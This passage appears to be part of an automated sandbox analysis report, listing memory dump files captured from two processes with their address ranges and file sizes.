                                                                                                                  • memory/4352-38-0x000001A781F10000-0x000001A782B3C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    12.2MB

                                                                                                                  • memory/4352-37-0x000001A781E80000-0x000001A781EBE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    248KB

                                                                                                                  • memory/4352-36-0x000001A781DA0000-0x000001A781DA6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    24KB

                                                                                                                  • memory/4828-79-0x000002A991290000-0x000002A991296000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    24KB

                                                                                                                  • memory/4828-856-0x000002A993530000-0x000002A993A58000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.2MB

                                                                                                                  • memory/4828-75-0x000002A9906B0000-0x000002A990D98000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/4828-83-0x000002A992440000-0x000002A9924F2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    712KB

                                                                                                                  • memory/4828-74-0x000002A990000000-0x000002A9906A6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.6MB

                                                                                                                  • memory/4828-82-0x000002A9920B0000-0x000002A99243C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    3.5MB

                                                                                                                  • memory/4828-81-0x000002A991900000-0x000002A9920AE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                  • memory/4828-80-0x000002A9913B0000-0x000002A9918FE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.3MB

                                                                                                                  • memory/4828-85-0x000002A992530000-0x000002A99259A000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    424KB

                                                                                                                  • memory/4828-86-0x000002A9925A0000-0x000002A9925E2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    264KB

                                                                                                                  • memory/4828-76-0x00007FFAA5990000-0x00007FFAA5B85000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    2.0MB

                                                                                                                  • memory/4828-77-0x00007FFAA4C00000-0x00007FFAA4CBE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    760KB

                                                                                                                  • memory/4828-90-0x0000000180000000-0x0000000180007000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    28KB

                                                                                                                  • memory/4828-796-0x000002A9EF940000-0x000002A9EF990000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    320KB

                                                                                                                  • memory/4828-798-0x000002A9FFD20000-0x000002A9FFDD2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    712KB

                                                                                                                  • memory/4828-799-0x000002AA00000000-0x000002AA001C2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.8MB

                                                                                                                  • memory/4828-800-0x000002A992CD0000-0x000002A992D72000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    648KB

                                                                                                                  • memory/4828-802-0x000002A9EF990000-0x000002A9EF9CC000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    240KB

                                                                                                                  • memory/4828-78-0x000002A991280000-0x000002A991286000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    24KB